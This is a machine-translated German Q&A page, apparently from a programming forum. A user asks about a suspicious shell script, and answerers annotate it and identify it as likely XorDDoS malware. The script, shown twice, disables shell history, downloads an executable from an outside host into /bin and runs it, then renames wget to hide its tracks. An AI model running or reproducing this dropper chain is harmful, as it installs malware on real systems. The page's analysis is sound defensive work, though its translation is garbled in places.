PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
unset HISTFILE HISTLOG HISTORY
HISTFILE=/dev/null
HISTSIZE=0
cd /bin/
wget http://wesaem.co.kr/download/m/5414 -O acxxxhruvc
chmod + x acxxxhruvc /bin/acxxxhruvc
good http://wesaem.co.kr/download/m/5414 -O acxxxhruvc
chmod + x acxxxhruvc /bin/acxxxhruvc
sleep 2
mv /usr/bin/wget /usr/bin/good
mv /bin/wget /bin/good
ls -la /etc/daemon.cfg
exit 0
1
A
Antwort
2
Meine Kommentare sind inline unter
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
unset HISTFILE HISTLOG HISTORY
HISTFILE=/dev/null
HISTSIZE=0
cd /bin/
#download an executable
wget http://wesaem.co.kr/download/m/5414 -O acxxxhruvc
chmod + x acxxxhruvc
#run the downloaded executable
/bin/acxxxhruvc
good http://wesaem.co.kr/download/m/5414 -O acxxxhruvc
#it seems like it downloads an executable to overwrite the existing one
chmod + x acxxxhruvc
/bin/acxxxhruvc
sleep 2
#remove the wget application and overwrite the good application with it
mv /usr/bin/wget /usr/bin/good
mv /bin/wget /bin/good
list the details of this daemon.cfg file
ls -la /etc/daemon.cfg
exit 0
Grundsätzlich ist die gute Anwendung mit wget überschrieben, die ich denke, das gleiche wirkt.
Insgesamt macht es nichts, was Sie wahrscheinlich wollen. Könnte eine Malware sein.
0
Wenn Sie wirklich neugierig sind, nur die verdächtige Datei herunterladen (acxxxhruvc
) und untersucht es (zB mit strings acxxxhruvc
) oder es zu einem gewissen Scan-Service einreichen (zB VirusTotal)
In diesem Fall ist es looks like einig Variante XorDDOs
Verwandte Themen
- 1. Kann mir jemand das erklären?
- 2. Kann mir jemand erklären docker.sock
- 3. Kann mir jemand erklären, welche Funktion ($) hat in jQuery
- 4. Kann mir jemand ASP.NET-Routing-Syntax erklären?
- 5. Kann mir jemand diese Haskell-Funktionen erklären?
- 6. Kann mir jemand den folgenden Code erklären?
- 7. Callbacks & params.require - Kann mir das jemand erklären?
- 8. Kann mir jemand diesen Decorator Code erklären?
- 9. Kann mir jemand diesen Fehler erklären?
- 10. Kann mir jemand C++ - Ausnahme-Spezifikationen erklären?
- 11. Kann mir jemand den folgenden Code erklären?
- 12. Kann jemand mir erklären, wie es? Ich
- 13. Kann mir jemand erklären, wie das funktioniert?
- 14. Kann mir jemand diese Fehler erklären?
- 15. Kann mir jemand erklären was genau diese Ausgabe sagt?
- 16. Kann mir jemand erklären, was Status und veränderbare Daten sind?
- 17. Kann mir jemand erklären, was dieser C one-Liner leistet?
- 18. Kann mir jemand erklären, diese `StaleDataException`
- 19. Kann mir jemand diesen JavaScript-Code erklären?
- 20. Kann mir jemand erklären, was diese GetCardinality-Methode macht?
- 21. Kann mir jemand erklären, was dieser PHP-Code macht?
- 22. UML: Kann mir jemand das Diagramm der Fabrikmethode erklären?
- 23. Hallo. Kann mir jemand sagen, was mit diesem Code passiert? Kann mir jemand erklären, was hier passiert?
- 24. Hat jemand versucht, Flax?
- 25. Kann mir jemand diesen Code mit der Funktion .bind() erklären?
- 26. Jeder kann erklären mir
- 27. Kann mir bitte jemand die Ausgabe von C-Programm erklären?
- 28. Kann mir jemand diese PHP-Code-Injektion erklären?
- 29. Kann mir jemand diesen wirklich grundlegenden Python-Code erklären?
- 30. Kann mir jemand den Reddit-Exploit des letzten Jahres erklären?
danke für die Antwort! – hax12
Bitte akzeptieren Sie, wenn es Ihr Problem löst – aec
, wenn Sie mich detailliertere Erklärung bitte geben können, und was ist das Ziel dahinter :) – hax12